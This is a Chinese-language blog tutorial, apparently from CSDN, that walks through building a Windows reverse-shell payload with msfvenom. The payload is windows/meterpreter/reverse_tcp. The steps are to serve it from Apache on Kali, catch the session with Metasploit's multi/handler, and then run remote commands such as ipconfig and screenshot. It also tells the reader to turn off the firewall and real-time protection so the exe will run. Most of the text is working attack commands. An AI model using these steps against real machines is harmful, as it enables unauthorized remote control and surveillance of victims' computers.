一、准备工作
先在kali安装Apache2,下载代码如下
sudo apt install apache2
启动Apache2服务
service apache2 start
在kali浏览器中输入你的kali IP,得到该页面说明启动成功
二、开始
1.msf远控生成
(1)在kali运行msf生成exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的kali_ip LPORT=5000 -f exe -o /root/payload.exe
这里刚开始的LPORT设为5000,但是在后文会提到一些其他情况,后文再说
(2) 将有效载荷文件复制到 Apache 的根目录
sudo cp /root/payload.exe /var/www/html/
可以发现已经放进根目录了
(3) 设置 Metasploit 监听器
启动 Metasploit 控制台,召唤出来一个南瓜头(也召唤出过别的)
msfconsole
使用多重处理程序
use exploit/multi/handler
设置有效载荷
set payload windows/meterpreter/reverse_tcp
设置 LHOST 和 LPORT
set LHOST + 你的kali IP
set LPORT 5000
这里还是用5000,看一下等下发生了啥
启动监听器
exploit
会发现
[-]处理程序无法绑定到 xxx.xxx.xxx.129:5000:- -
[-]处理程序无法绑定到 0.0.0.0:5000:- -
[-]漏洞利用失败 [bad-config]: Rex::BindFailed 地址已在使用中或不可用: (0.0.0.0:5000)。
[*]利用已完成,但未创建会话。
后面想了想可能是5000端口被占用或者啥的,反正用不了,这时候可以改一下端口
改成5001
再次exploit
成功了(如果5000端口没出问题就不用考虑这一步)
2.在物理机上下载刚才做好的payload.exe
打开浏览器,输入
http://你的Kali IP/payload.exe
记得要把防火墙和实时保护给关了,不然不让安装
安装后打开
三、远控实现以及命令
回到kali,搞点操作
ipconfig
可以拿到物理机的ip地址
screenshot
可以完成物理机实时的截图以及图片保存的地址
当然还有更多其他指令,有兴趣的可以去搜搜然后来试试效果
总结
本文介绍了如何利用Msfvenom对Windows进行远程控制,期间出现端口出问题的情况也得到有效解决,谢谢观看
标签:exe,Windows,kali,payload,LPORT,5000,0.0,Msfvenom,远程 From: https://blog.csdn.net/2302_79636295/article/details/143420984